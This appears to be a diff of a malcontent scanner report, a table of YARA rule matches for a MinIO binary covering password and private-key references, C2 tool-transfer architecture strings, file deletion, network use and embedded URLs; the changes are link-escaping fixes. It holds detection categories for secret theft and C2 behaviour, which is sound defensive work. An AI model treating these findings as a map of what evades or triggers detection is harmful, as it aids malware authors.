[randomJitter](https://github.com/search?q=randomJitter&type=code)
[randomString](https://github.com/search?q=randomString&type=code)
[setRandomLip](https://github.com/search?q=setRandomLip&type=code)
[ucc128random](https://github.com/search?q=ucc128random&type=code)
[NoRandomize](https://github.com/search?q=NoRandomize&type=code)
[randomOrder](https://github.com/search?q=randomOrder&type=code)
[randomPoint](https://github.com/search?q=randomPoint&type=code)
[random_seed](https://github.com/search?q=random_seed&type=code)
[MustRandom](https://github.com/search?q=MustRandom&type=code)
[Randomized](https://github.com/search?q=Randomized&type=code)
[namerandom](https://github.com/search?q=namerandom&type=code)
[nextRandom](https://github.com/search?q=nextRandom&type=code)
[randomEnum](https://github.com/search?q=randomEnum&type=code)
[randomSeed](https://github.com/search?q=randomSeed&type=code)
[randomUUID](https://github.com/search?q=randomUUID&type=code)
[randomized](https://github.com/search?q=randomized&type=code)
[randomness](https://github.com/search?q=randomness&type=code)
[randomseed](https://github.com/search?q=randomseed&type=code)
[urandomDES](https://github.com/search?q=urandomDES&type=code)
[AddRandom](https://github.com/search?q=AddRandom&type=code)
[randomId](https://github.com/search?q=randomId&type=code)
[srandom](https://github.com/search?q=srandom&type=code) | -| LOW | [c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref) | references a specific architecture | [https://](https://)
[http://](http://)
[x86_64](https://github.com/search?q=x86_64&type=code)
[AMD64](https://github.com/search?q=AMD64&type=code)
[amd64](https://github.com/search?q=amd64&type=code)
[arm64](https://github.com/search?q=arm64&type=code) | +| LOW | [c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref) | references a specific architecture | [https://](https%3A%2F%2F)
[http://](http%3A%2F%2F)
[x86_64](https://github.com/search?q=x86_64&type=code)
[AMD64](https://github.com/search?q=AMD64&type=code)
[amd64](https://github.com/search?q=amd64&type=code)
[arm64](https://github.com/search?q=arm64&type=code) | | LOW | [credential/password](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/password/password.yara#password) | references a 'password' | [Attribute SyntaxPassword must be changed](https://github.com/search?q=Attribute+SyntaxPassword+must+be+changed&type=code)
[For decrypting password-protected PDFs](https://github.com/search?q=For+decrypting+password-protected+PDFs&type=code)
[but a non-empty password was provided](https://github.com/search?q=but+a+non-empty+password+was+provided&type=code)
[ERR_KEY_EXPIRED Password has expired](https://github.com/search?q=ERR_KEY_EXPIRED+Password+has+expired&type=code)
[end of groupPassword Policy - Behera](https://github.com/search?q=end+of+groupPassword+Policy+-+Behera&type=code)
[requires old password authentication](https://github.com/search?q=requires+old+password+authentication&type=code)
[AuthUserChangePasswordResponseproto](https://github.com/search?q=AuthUserChangePasswordResponseproto&type=code)
[a wrong or no password was provided](https://github.com/search?q=a+wrong+or+no+password+was+provided&type=code)
[AuthUserChangePasswordRequestproto](https://github.com/search?q=AuthUserChangePasswordRequestproto&type=code)
[account_change_password_parameters](https://github.com/search?q=account_change_password_parameters&type=code)
[account_change_password_responses](https://github.com/search?q=account_change_password_responses&type=code)
[nexport default PasswordResponses](https://github.com/search?q=nexport+default+PasswordResponses&type=code)
[updated the password for the user](https://github.com/search?q=updated+the+password+for+the+user&type=code)
[your current passwordduration can](https://github.com/search?q=your+current+passwordduration+can&type=code)
[AccountChangePasswordHandlerFunc](https://github.com/search?q=AccountChangePasswordHandlerFunc&type=code)
[AccountChangePasswordHandleruser](https://github.com/search?q=AccountChangePasswordHandleruser&type=code)
[Lookup Bind Password is required](https://github.com/search?q=Lookup+Bind+Password+is+required&type=code)
[n new PasswordException](https://github.com/search?q=n++++++++++new+PasswordException&type=code)
[nexport default PasswordSelector](https://github.com/search?q=nexport+default+PasswordSelector&type=code)
[nimport ChangePasswordModal from](https://github.com/search?q=nimport+ChangePasswordModal+from&type=code)
[the provided passwordRole Policy](https://github.com/search?q=the+provided+passwordRole+Policy&type=code)
[NewAccountChangePasswordDefault](https://github.com/search?q=NewAccountChangePasswordDefault&type=code)
[account_change_password_request](https://github.com/search?q=account_change_password_request&type=code)
[authenticationpassword for SASL](https://github.com/search?q=authenticationpassword+for+SASL&type=code)
[change_user_password_parameters](https://github.com/search?q=change_user_password_parameters&type=code)
[n case PasswordResponses](https://github.com/search?q=n++++++++case+PasswordResponses&type=code)
[NewControlBeheraPasswordPolicy](https://github.com/search?q=NewControlBeheraPasswordPolicy&type=code)
[bson bytes as Passwordproducer](https://github.com/search?q=bson+bytes+as+Passwordproducer&type=code)
[change_user_password_responses](https://github.com/search?q=change_user_password_responses&type=code)
[e instanceof PasswordException](https://github.com/search?q=e+instanceof+PasswordException&type=code)
[nimport PasswordResponses from](https://github.com/search?q=nimport+PasswordResponses+from&type=code)
[setChangeUserPasswordModalOpen](https://github.com/search?q=setChangeUserPasswordModalOpen&type=code)
[ChangeUserPasswordHandlerFunc](https://github.com/search?q=ChangeUserPasswordHandlerFunc&type=code)
[ControlVChuPasswordMustChange](https://github.com/search?q=ControlVChuPasswordMustChange&type=code)
[SecurityChangePasswordRequest](https://github.com/search?q=SecurityChangePasswordRequest&type=code)
[bind_passwordmalformed JWK EC](https://github.com/search?q=bind_passwordmalformed+JWK+EC&type=code)
[getChangeUserPasswordResponse](https://github.com/search?q=getChangeUserPasswordResponse&type=code)
[native_passwordinvalid dbname](https://github.com/search?q=native_passwordinvalid+dbname&type=code)
[nimport PasswordSelector from](https://github.com/search?q=nimport+PasswordSelector+from&type=code)
[qunexpected password response](https://github.com/search?q=qunexpected+password+response&type=code)
[user ID or passwordetcdserver](https://github.com/search?q=user+ID+or+passwordetcdserver&type=code)
[AccountChangePasswordRequest](https://github.com/search?q=AccountChangePasswordRequest&type=code)
[ChangeUserPasswordModal from](https://github.com/search?q=ChangeUserPasswordModal+from&type=code)
[NewChangeUserPasswordDefault](https://github.com/search?q=NewChangeUserPasswordDefault&type=code)
[accountChangePasswordRequest](https://github.com/search?q=accountChangePasswordRequest&type=code)
[change_user_password_request](https://github.com/search?q=change_user_password_request&type=code)
[for field HashedPasswordgrpc](https://github.com/search?q=for+field+HashedPasswordgrpc&type=code)
[in list of old passwordsldap](https://github.com/search?q=in+list+of+old+passwordsldap&type=code)
[return new PasswordException](https://github.com/search?q=return+new+PasswordException&type=code)
[AccountChangePasswordParams](https://github.com/search?q=AccountChangePasswordParams&type=code)
[AuthUserChangePasswordproto](https://github.com/search?q=AuthUserChangePasswordproto&type=code)
[changeUserPasswordModalOpen](https://github.com/search?q=changeUserPasswordModalOpen&type=code)
[d for field NoPasswordproto](https://github.com/search?q=d+for+field+NoPasswordproto&type=code)
[note your new password down](https://github.com/search?q=note+your+new+password+down&type=code)
[order to change passwordssh](https://github.com/search?q=order+to+change+passwordssh&type=code)
[throw new PasswordException](https://github.com/search?q=throw+new+PasswordException&type=code)
[ControlVChuPasswordWarning](https://github.com/search?q=ControlVChuPasswordWarning&type=code)
[during onPassword callback](https://github.com/search?q=during+onPassword+callback&type=code)
[n PasswordKeyIcon](https://github.com/search?q=n++++++++++PasswordKeyIcon&type=code)
[setChangePasswordModalOpen](https://github.com/search?q=setChangePasswordModalOpen&type=code)
[user name or passwordnkeys](https://github.com/search?q=user+name+or+passwordnkeys&type=code)
[Change User Password Icon](https://github.com/search?q=Change+User+Password+Icon&type=code)
[ChangeUserPasswordCreated](https://github.com/search?q=ChangeUserPasswordCreated&type=code)
[ChangeUserPasswordRequest](https://github.com/search?q=ChangeUserPasswordRequest&type=code)
[Change_User_Password_Icon](https://github.com/search?q=Change_User_Password_Icon&type=code)
[changeUserPasswordRequest](https://github.com/search?q=changeUserPasswordRequest&type=code)
[d for field Passwordproto](https://github.com/search?q=d+for+field+Passwordproto&type=code)
[getChangePasswordResponse](https://github.com/search?q=getChangePasswordResponse&type=code)
[ChangeUserPasswordParams](https://github.com/search?q=ChangeUserPasswordParams&type=code)
[IChangeUserPasswordProps](https://github.com/search?q=IChangeUserPasswordProps&type=code)
[PasswordCredentialsToken](https://github.com/search?q=PasswordCredentialsToken&type=code)
[const changeUserPassword](https://github.com/search?q=const+changeUserPassword&type=code)
[deleteIncorrect password](https://github.com/search?q=deleteIncorrect+password&type=code)
[n setPassword](https://github.com/search?q=n++++++++++++setPassword&type=code)
[nconst PasswordResponses](https://github.com/search?q=nconst+PasswordResponses&type=code)
[nconst defaultOnPassword](https://github.com/search?q=nconst+defaultOnPassword&type=code)
[valid or client password](https://github.com/search?q=valid+or+client+password&type=code)
[AllowCleartextPasswords](https://github.com/search?q=AllowCleartextPasswords&type=code)
[Also called as password](https://github.com/search?q=Also+called+as+password&type=code)
[HashedPasswordQprotobuf](https://github.com/search?q=HashedPasswordQprotobuf&type=code)
[Type New Password Again](https://github.com/search?q=Type+New+Password+Again&type=code)
[allowCleartextPasswords](https://github.com/search?q=allowCleartextPasswords&type=code)
[changePasswordModalOpen](https://github.com/search?q=changePasswordModalOpen&type=code)
[n setNewPassword](https://github.com/search?q=n++++++++setNewPassword&type=code)
[n changeUserPassword](https://github.com/search?q=n++++changeUserPassword&type=code)
[n const changePassword](https://github.com/search?q=n++const+changePassword&type=code)
[n const subnetPassword](https://github.com/search?q=n++const+subnetPassword&type=code)
[n lookup_bind_password](https://github.com/search?q=n++lookup_bind_password&type=code)
[name ChangeUserPassword](https://github.com/search?q=name+ChangeUserPassword&type=code)
[nconst PasswordSelector](https://github.com/search?q=nconst+PasswordSelector&type=code)
[return new PasswordEdit](https://github.com/search?q=return+new+PasswordEdit&type=code)
[UserChangePasswordgrpc](https://github.com/search?q=UserChangePasswordgrpc&type=code)
[authUserChangePassword](https://github.com/search?q=authUserChangePassword&type=code)
[changed to Password ok](https://github.com/search?q=changed+to+Password+ok&type=code)
[default ChangePassword](https://github.com/search?q=default+ChangePassword&type=code)
[link PasswordResponses](https://github.com/search?q=link+PasswordResponses&type=code)
[n setSubnetPassword](https://github.com/search?q=n++++setSubnetPassword&type=code)
[AcroFormPasswordField](https://github.com/search?q=AcroFormPasswordField&type=code)
[Redis server password](https://github.com/search?q=Redis+server+password&type=code)
[SASLprepping password](https://github.com/search?q=SASLprepping+password&type=code)
[n ChangePasswordIcon](https://github.com/search?q=n++ChangePasswordIcon&type=code)
[nconst ChangePassword](https://github.com/search?q=nconst+ChangePassword&type=code)
[sendEncryptedPassword](https://github.com/search?q=sendEncryptedPassword&type=code)
[socksUsernamePassword](https://github.com/search?q=socksUsernamePassword&type=code)
[with the new password](https://github.com/search?q=with+the+new+password&type=code)
[your Console password](https://github.com/search?q=your+Console+password&type=code)
[AllowNativePasswords](https://github.com/search?q=AllowNativePasswords&type=code)
[IChangePasswordProps](https://github.com/search?q=IChangePasswordProps&type=code)
[change-user-password](https://github.com/search?q=change-user-password&type=code)
[const updatePassword](https://github.com/search?q=const+updatePassword&type=code)
[n PasswordException](https://github.com/search?q=n++PasswordException&type=code)
[n PasswordResponses](https://github.com/search?q=n++PasswordResponses&type=code)
[n setSubnetPassword](https://github.com/search?q=n++setSubnetPassword&type=code)
[password requiredtls](https://github.com/search?q=password+requiredtls&type=code)
[user_change_password](https://github.com/search?q=user_change_password&type=code)
[Change Password for](https://github.com/search?q=Change+Password+for&type=code)
[Change password for](https://github.com/search?q=Change+password+for&type=code)
[Enter LDAP Password](https://github.com/search?q=Enter+LDAP+Password&type=code)
[Enter NATS password](https://github.com/search?q=Enter+NATS+password&type=code)
[Enter SASL Password](https://github.com/search?q=Enter+SASL+Password&type=code)
[_passwordCapability](https://github.com/search?q=_passwordCapability&type=code)
[save-password-modal](https://github.com/search?q=save-password-modal&type=code)
[scrambleOldPassword](https://github.com/search?q=scrambleOldPassword&type=code)
[static passwordEdit](https://github.com/search?q=static+passwordEdit&type=code)
[AllowEmptyPassword](https://github.com/search?q=AllowEmptyPassword&type=code)
[GetKeyFromPassword](https://github.com/search?q=GetKeyFromPassword&type=code)
[Incorrect Password](https://github.com/search?q=Incorrect+Password&type=code)
[LookupBindPassword](https://github.com/search?q=LookupBindPassword&type=code)
[checkOwnerPassword](https://github.com/search?q=checkOwnerPassword&type=code)
[lookupBindPassword](https://github.com/search?q=lookupBindPassword&type=code)
[n setPassword](https://github.com/search?q=n++++++setPassword&type=code)
[n PasswordKeyIcon](https://github.com/search?q=n++PasswordKeyIcon&type=code)
[save-user-password](https://github.com/search?q=save-user-password&type=code)
[setCurrentPassword](https://github.com/search?q=setCurrentPassword&type=code)
[AllowOldPasswords](https://github.com/search?q=AllowOldPasswords&type=code)
[GetHashedPassword](https://github.com/search?q=GetHashedPassword&type=code)
[New passwords don](https://github.com/search?q=New+passwords+don&type=code)
[No password given](https://github.com/search?q=No+password+given&type=code)
[Password for SASL](https://github.com/search?q=Password+for+SASL&type=code)
[PasswordCanChange](https://github.com/search?q=PasswordCanChange&type=code)
[PasswordEprotobuf](https://github.com/search?q=PasswordEprotobuf&type=code)
[allowOldPasswords](https://github.com/search?q=allowOldPasswords&type=code)
[and root password](https://github.com/search?q=and+root+password&type=code)
[checkUserPassword](https://github.com/search?q=checkUserPassword&type=code)
[key from password](https://github.com/search?q=key+from+password&type=code)
[n const password](https://github.com/search?q=n++const+password&type=code)
[n subnetPassword](https://github.com/search?q=n++subnetPassword&type=code)
[postgres password](https://github.com/search?q=postgres+password&type=code)
[BadPasswordCount](https://github.com/search?q=BadPasswordCount&type=code)
[Current Password](https://github.com/search?q=Current+Password&type=code)
[Invalid password](https://github.com/search?q=Invalid+password&type=code)
[PasswordCallback](https://github.com/search?q=PasswordCallback&type=code)
[current-password](https://github.com/search?q=current-password&type=code)
[encoded password](https://github.com/search?q=encoded+password&type=code)
[n setPassword](https://github.com/search?q=n++++setPassword&type=code)
[password sslmode](https://github.com/search?q=password+sslmode&type=code)
[readPasswordLine](https://github.com/search?q=readPasswordLine&type=code)
[scramblePassword](https://github.com/search?q=scramblePassword&type=code)
[setReNewPassword](https://github.com/search?q=setReNewPassword&type=code)
[NewWithPassword](https://github.com/search?q=NewWithPassword&type=code)
[Password string](https://github.com/search?q=Password+string&type=code)
[PasswordLastSet](https://github.com/search?q=PasswordLastSet&type=code)
[TLS passwordkey](https://github.com/search?q=TLS+passwordkey&type=code)
[change-password](https://github.com/search?q=change-password&type=code)
[currentPassword](https://github.com/search?q=currentPassword&type=code)
[encryptPassword](https://github.com/search?q=encryptPassword&type=code)
[n password](https://github.com/search?q=n++++++password&type=code)
[re-new-password](https://github.com/search?q=re-new-password&type=code)
[sshPasswordAuth](https://github.com/search?q=sshPasswordAuth&type=code)
[subnet-password](https://github.com/search?q=subnet-password&type=code)
[Enter Password](https://github.com/search?q=Enter+Password&type=code)
[PasswordModify](https://github.com/search?q=PasswordModify&type=code)
[hashedPassword](https://github.com/search?q=hashedPassword&type=code)
[passwordReader](https://github.com/search?q=passwordReader&type=code)
[passwordset to](https://github.com/search?q=passwordset+to&type=code)
[saltedPassword](https://github.com/search?q=saltedPassword&type=code)
[t Passwordflag](https://github.com/search?q=t+Passwordflag&type=code)
[MQTT password](https://github.com/search?q=MQTT+password&type=code)
[Password from](https://github.com/search?q=Password+from&type=code)
[n password](https://github.com/search?q=n++++password&type=code)
[reNewPassword](https://github.com/search?q=reNewPassword&type=code)
[sasl_password](https://github.com/search?q=sasl_password&type=code)
[stripPassword](https://github.com/search?q=stripPassword&type=code)
[LDAPPassword](https://github.com/search?q=LDAPPassword&type=code)
[PasswordFlag](https://github.com/search?q=PasswordFlag&type=code)
[ReadPassword](https://github.com/search?q=ReadPassword&type=code)
[get password](https://github.com/search?q=get+password&type=code)
[passwordChar](https://github.com/search?q=passwordChar&type=code)
[rootPassword](https://github.com/search?q=rootPassword&type=code)
[saltPassword](https://github.com/search?q=saltPassword&type=code)
[GetPassword](https://github.com/search?q=GetPassword&type=code)
[HasPassword](https://github.com/search?q=HasPassword&type=code)
[SetPassword](https://github.com/search?q=SetPassword&type=code)
[n password](https://github.com/search?q=n++password&type=code)
[newPassword](https://github.com/search?q=newPassword&type=code)
[newpassword](https://github.com/search?q=newpassword&type=code)
[no_password](https://github.com/search?q=no_password&type=code)
[passwordSet](https://github.com/search?q=passwordSet&type=code)
[mypassword](https://github.com/search?q=mypassword&type=code)
[noPassword](https://github.com/search?q=noPassword&type=code) | | LOW | [credential/ssl/private_key](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/ssl/private_key.yara#private_key_val) | References private keys | [PRIVATE_KEY](https://github.com/search?q=PRIVATE_KEY&type=code)
[private_key](https://github.com/search?q=private_key&type=code)
[privateKey](https://github.com/search?q=privateKey&type=code) | | LOW | [crypto/aes](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/aes.yara#crypto_aes) | Supports AES (Advanced Encryption Standard) | [crypto/aes](https://github.com/search?q=crypto%2Faes&type=code)
[AES](https://github.com/search?q=AES&type=code) | @@ -141,8 +141,8 @@ | LOW | [fs/file/append](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-append.yara#append_file) | appends to a file | [appendFile](https://github.com/search?q=appendFile&type=code) | | LOW | [fs/file/capabilities_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-capabilities-set.yara#setfcap) | [Set file capabilities](https://man7.org/linux/man-pages/man7/capabilities.7.html) | [setcap](https://github.com/search?q=setcap&type=code) | | LOW | [fs/file/delete_forcibly](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete-forcibly.yara#rm_force) | Forcibly deletes files | [rm - Transformation matrix.](https://github.com/search?q=rm+-+Transformation+matrix.&type=code) | -| LOW | [fs/file/open](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-open.yara#py_open) | opens files | [open(](https://github.com/search?q=open%28&type=code) | -| LOW | [fs/file/read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-read.yara#go_file_read) | reads files | [os.(*File).Read](https://github.com/search?q=os.%28%2AFile%29.Read&type=code)
[ReadFile](https://github.com/search?q=ReadFile&type=code) | +| LOW | [fs/file/open](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-open.yara#py_open) | opens files | [open\(](https://github.com/search?q=open%28&type=code) | +| LOW | [fs/file/read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-read.yara#go_file_read) | reads files | [os.\(*File\).Read](https://github.com/search?q=os.%28%2AFile%29.Read&type=code)
[ReadFile](https://github.com/search?q=ReadFile&type=code) | | LOW | [fs/file/rename](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-rename.yara#explicit_rename) | renames files | [os.Rename](https://github.com/search?q=os.Rename&type=code)
[os.rename](https://github.com/search?q=os.rename&type=code) | | LOW | [fs/file/times_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-times-set.yara#utimensat) | [change file timestamps with nanosecond precision](https://linux.die.net/man/3/futimens) | [utimensat](https://github.com/search?q=utimensat&type=code) | | LOW | [fs/file/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-write.yara#file_write) | writes to file | [writeUniqueFileInfo](https://github.com/search?q=writeUniqueFileInfo&type=code)
[writeRawFile](https://github.com/search?q=writeRawFile&type=code)
[WriteFile](https://github.com/search?q=WriteFile&type=code)
[writeFile](https://github.com/search?q=writeFile&type=code) | @@ -185,13 +185,13 @@ | LOW | [net/tcp/grpc](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/tcp/grpc.yara#grpc) | Uses the gRPC Remote Procedure Call framework | [gRPC](https://github.com/search?q=gRPC&type=code) | | LOW | [net/udp/receive](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/udp/udp-receive.yara#udp_listen) | Listens for UDP responses | [ReadFromUDP](https://github.com/search?q=ReadFromUDP&type=code)
[listenUDP](https://github.com/search?q=listenUDP&type=code) | | LOW | [net/udp/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/udp/udp-send.yara#udp_send) | Sends UDP packets | [WriteMsgUDP](https://github.com/search?q=WriteMsgUDP&type=code)
[DialUDP](https://github.com/search?q=DialUDP&type=code) | -| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://IsLatestPrefixesUploadIDMaxPartsUserTagsIf-Matchprofileris-groupl](https://IsLatestPrefixesUploadIDMaxPartsUserTagsIf-Matchprofileris-groupl)
[https://api.loganalytics.usservicebus.chinacloudapi.cndocuments.microsoft](https://api.loganalytics.usservicebus.chinacloudapi.cndocuments.microsoft)
[https://batch.cloudapi.de/mysql.database.cloudapi.decloudapp.microsoftazu](https://batch.cloudapi.de/mysql.database.cloudapi.decloudapp.microsoftazu)
[https://blog.min.io/cohasset-associates-assessment-for-object-locking-on-](https://blog.min.io/cohasset-associates-assessment-for-object-locking-on-)
[https://blog.min.io/content/images/size/w1000/2020/12/pay_banner-01-01-01](https://blog.min.io/content/images/size/w1000/2020/12/pay_banner-01-01-01)
[https://blog.min.io/content/images/size/w1000/2021/04/Screenshot-at-Apr-0](https://blog.min.io/content/images/size/w1000/2021/04/Screenshot-at-Apr-0)
[https://blog.min.io/content/images/size/w1000/2021/09/denys-nevozhai-7nrs](https://blog.min.io/content/images/size/w1000/2021/09/denys-nevozhai-7nrs)
[https://blog.min.io/content/images/size/w1000/2022/08/Supportability-blog](https://blog.min.io/content/images/size/w1000/2022/08/Supportability-blog)
[https://blog.min.io/content/images/size/w1000/2022/09/Screen-Shot-2022-09](https://blog.min.io/content/images/size/w1000/2022/09/Screen-Shot-2022-09)
[https://blog.min.io/content/images/size/w1000/2022/12/Screen-Shot-2022-12](https://blog.min.io/content/images/size/w1000/2022/12/Screen-Shot-2022-12)
[https://blog.min.io/content/images/size/w1000/2022/12/replication-bestpra](https://blog.min.io/content/images/size/w1000/2022/12/replication-bestpra)
[https://blog.min.io/content/images/size/w1000/2023/02/Understanding-the-M](https://blog.min.io/content/images/size/w1000/2023/02/Understanding-the-M)
[https://blog.min.io/content/images/size/w1000/2023/03/SUBNET-Healthcheck-](https://blog.min.io/content/images/size/w1000/2023/03/SUBNET-Healthcheck-)
[https://blog.min.io/content/images/size/w1000/2023/03/SUBNET-call-home.jp](https://blog.min.io/content/images/size/w1000/2023/03/SUBNET-call-home.jp)
[https://blog.min.io/content/images/size/w1000/2023/03/faststreaming-03.jp](https://blog.min.io/content/images/size/w1000/2023/03/faststreaming-03.jp)
[https://blog.min.io/content/images/size/w1000/2023/04/PXL_20230417_154022](https://blog.min.io/content/images/size/w1000/2023/04/PXL_20230417_154022)
[https://blog.min.io/content/images/size/w1000/2023/04/Screen-Shot-2023-04](https://blog.min.io/content/images/size/w1000/2023/04/Screen-Shot-2023-04)
[https://blog.min.io/content/images/size/w2000/2019/05/Screenshot-at-May-1](https://blog.min.io/content/images/size/w2000/2019/05/Screenshot-at-May-1)
[https://blog.min.io/content/images/size/w2000/2020/07/1920px-Immeuble_du_](https://blog.min.io/content/images/size/w2000/2020/07/1920px-Immeuble_du_)
[https://blog.min.io/content/images/size/w2000/2021/07/pexels-shockphoto-b](https://blog.min.io/content/images/size/w2000/2021/07/pexels-shockphoto-b)
[https://blog.min.io/content/images/size/w2000/2021/09/1_kqpVTzo8b0e2oKdOj](https://blog.min.io/content/images/size/w2000/2021/09/1_kqpVTzo8b0e2oKdOj)
[https://blog.min.io/content/images/size/w2000/2021/09/denys-nevozhai-7nrs](https://blog.min.io/content/images/size/w2000/2021/09/denys-nevozhai-7nrs)
[https://blog.min.io/content/images/size/w2000/2021/11/josh-rose-trYl7JYAT](https://blog.min.io/content/images/size/w2000/2021/11/josh-rose-trYl7JYAT)
[https://blog.min.io/content/images/size/w2000/2022/06/pexels-pixabay-2101](https://blog.min.io/content/images/size/w2000/2022/06/pexels-pixabay-2101)
[https://blog.min.io/content/images/size/w2000/2022/08/minioKafka-bloghead](https://blog.min.io/content/images/size/w2000/2022/08/minioKafka-bloghead)
[https://blog.min.io/content/images/size/w2000/2023/09/active-active-email](https://blog.min.io/content/images/size/w2000/2023/09/active-active-email)
[https://blog.min.io/content/images/size/w2000/2023/10/Screen-Shot-2023-10](https://blog.min.io/content/images/size/w2000/2023/10/Screen-Shot-2023-10)
[https://blog.min.io/content/images/size/w2000/2023/11/Regulatory-Complian](https://blog.min.io/content/images/size/w2000/2023/11/Regulatory-Complian)
[https://blog.min.io/content/images/size/w2000/2023/11/eventnotifications-](https://blog.min.io/content/images/size/w2000/2023/11/eventnotifications-)
[https://blog.min.io/content/images/size/w2000/2024/01/blog-header-How-to-](https://blog.min.io/content/images/size/w2000/2024/01/blog-header-How-to-)
[https://blog.min.io/content/images/size/w2000/2024/01/blog-header-how-do-](https://blog.min.io/content/images/size/w2000/2024/01/blog-header-how-do-)
[https://blog.min.io/minio-multi-cloud-object-storage-available-on-aws-mar](https://blog.min.io/minio-multi-cloud-object-storage-available-on-aws-mar)
[https://cloud.githubusercontent.com/assets/7957859/21814330/a17d556a-d761](https://cloud.githubusercontent.com/assets/7957859/21814330/a17d556a-d761)
[https://connect.microsoft.com/IE/feedback/details/837245/xmlhttprequest-u](https://connect.microsoft.com/IE/feedback/details/837245/xmlhttprequest-u)
[https://database.usgovcloudapi.net/cloud.google.com/go/storage.ACL.Setclo](https://database.usgovcloudapi.net/cloud.google.com/go/storage.ACL.Setclo)
[https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Object](https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Object)
[https://developer.mozilla.org/en-US/docs/Web/API/FileSystemDirectoryEntry](https://developer.mozilla.org/en-US/docs/Web/API/FileSystemDirectoryEntry)
[https://developer.mozilla.org/en-US/docs/Web/API/FileSystemDirectoryReade](https://developer.mozilla.org/en-US/docs/Web/API/FileSystemDirectoryReade)
[https://developer.mozilla.org/en-US/docs/Web/API/HTMLInputElement/webkitd](https://developer.mozilla.org/en-US/docs/Web/API/HTMLInputElement/webkitd)
[https://developer.mozilla.org/en-US/docs/Web/API/HTML_Drag_and_Drop_API/R](https://developer.mozilla.org/en-US/docs/Web/API/HTML_Drag_and_Drop_API/R)
[https://developer.mozilla.org/en-US/docs/Web/API/KeyboardEvent/getModifie](https://developer.mozilla.org/en-US/docs/Web/API/KeyboardEvent/getModifie)
[https://developer.mozilla.org/en-US/docs/Web/API/window/showOpenFilePicke](https://developer.mozilla.org/en-US/docs/Web/API/window/showOpenFilePicke)
[https://developer.mozilla.org/en-US/docs/Web/Accessibility/Understanding_](https://developer.mozilla.org/en-US/docs/Web/Accessibility/Understanding_)
[https://developer.mozilla.org/en-US/docs/Web/HTTP/Basics_of_HTTP/MIME_typ](https://developer.mozilla.org/en-US/docs/Web/HTTP/Basics_of_HTTP/MIME_typ)
[https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_)
[https://developer.mozilla.org/en/docs/Web/JavaScript/Reference/Global_Obj](https://developer.mozilla.org/en/docs/Web/JavaScript/Reference/Global_Obj)
[https://dl.min.io/client/mc/release/linux-amd64/archive/mc.build/static/m](https://dl.min.io/client/mc/release/linux-amd64/archive/mc.build/static/m)
[https://dl.min.io/server/minio/release/X-Minio-Replication-Encrypted-Mult](https://dl.min.io/server/minio/release/X-Minio-Replication-Encrypted-Mult)
[https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-lifecycle-mg](https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-lifecycle-mg)
[https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_eleme](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_eleme)
[https://docs.microsoft.com/en-us/rest/api/storageservices/constructing-a-](https://docs.microsoft.com/en-us/rest/api/storageservices/constructing-a-)
[https://gallery.cloudapi.de/mariadb.database.cloudapi.dex-goog-encryption](https://gallery.cloudapi.de/mariadb.database.cloudapi.dex-goog-encryption)
[https://gallery.usgovcloudapi.net/mariadb.database.usgovcloudapi.netdev.a](https://gallery.usgovcloudapi.net/mariadb.database.usgovcloudapi.netdev.a)
[https://github.com/DefinitelyTyped/DefinitelyTyped/blob/90a4ec8/types/nod](https://github.com/DefinitelyTyped/DefinitelyTyped/blob/90a4ec8/types/nod)
[https://github.com/HTTPArchive/wappalyzer/blob/main/src/technologies/r.js](https://github.com/HTTPArchive/wappalyzer/blob/main/src/technologies/r.js)
[https://github.com/ReactiveX/rxjs/blob/6fafcf53dc9e557439b25debaeadfd224b](https://github.com/ReactiveX/rxjs/blob/6fafcf53dc9e557439b25debaeadfd224b)
[https://github.com/Rob--W/open-in-browser/blob/7e2e35a38b8b4e981b11da7b2f](https://github.com/Rob--W/open-in-browser/blob/7e2e35a38b8b4e981b11da7b2f)
[https://github.com/adobe-webplatform/Snap.svg/blob/b365287722a72526000ac4](https://github.com/adobe-webplatform/Snap.svg/blob/b365287722a72526000ac4)
[https://github.com/facebook/fbjs/blob/c69904a511b900266935168223063dd8772](https://github.com/facebook/fbjs/blob/c69904a511b900266935168223063dd8772)
[https://github.com/facebook/fbjs/blob/master/packages/fbjs/src/core/hyphe](https://github.com/facebook/fbjs/blob/master/packages/fbjs/src/core/hyphe)
[https://github.com/facebook/react/blob/a8a4742f1c54493df00da648a3f9d26e3d](https://github.com/facebook/react/blob/a8a4742f1c54493df00da648a3f9d26e3d)
[https://github.com/facebook/react/blob/b87aabdfe1b7461e7331abb3601d9e6bb2](https://github.com/facebook/react/blob/b87aabdfe1b7461e7331abb3601d9e6bb2)
[https://github.com/facebook/react/blob/master/packages/shared/formatProdE](https://github.com/facebook/react/blob/master/packages/shared/formatProdE)
[https://github.com/facebook/react/commit/977357765b44af8ff0cfea3278668610](https://github.com/facebook/react/commit/977357765b44af8ff0cfea3278668610)
